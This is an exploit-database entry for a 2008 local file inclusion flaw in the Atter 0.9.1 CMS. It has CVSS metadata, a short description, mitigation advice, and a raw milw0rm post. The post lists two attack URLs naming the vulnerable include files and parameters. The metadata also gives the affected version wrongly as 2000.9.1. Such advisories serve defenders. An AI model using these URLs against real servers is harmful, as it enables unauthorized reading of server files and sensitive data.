header-logo
Suggest Exploit
vendor:
Atter
by:
KnocKout
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Atter
Affected Version From: 2000.9.1
Affected Version To: 2000.9.1
Patch Exists: NO
Related CWE: N/A
CPE: a:atter:atter:0.9.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Atter 0.9.1 Local File Inclusion Vulnerability

Atter 0.9.1 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a maliciously crafted parameter value that points to a local file on the server. This allows the attacker to read the contents of the local file and gain access to sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file path. Also, ensure that the web server is configured to deny access to files outside of the web root directory.
Source

Exploit-DB raw data:

Atter 0.9.1 Local File Inclusion Vulnerability

#################################################

Author : KnocKout
ThanX : CW ALL USERS

=================================================

Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5

Attackz :

http://localsite.com/path/include/functions.inc.php?class=[Local File]
http://localsite.com/path/include/common.inc.php?file=[Local File]

#################################################

# milw0rm.com [2008-04-19]

Navigation

Suggest Exploit

Services By CQR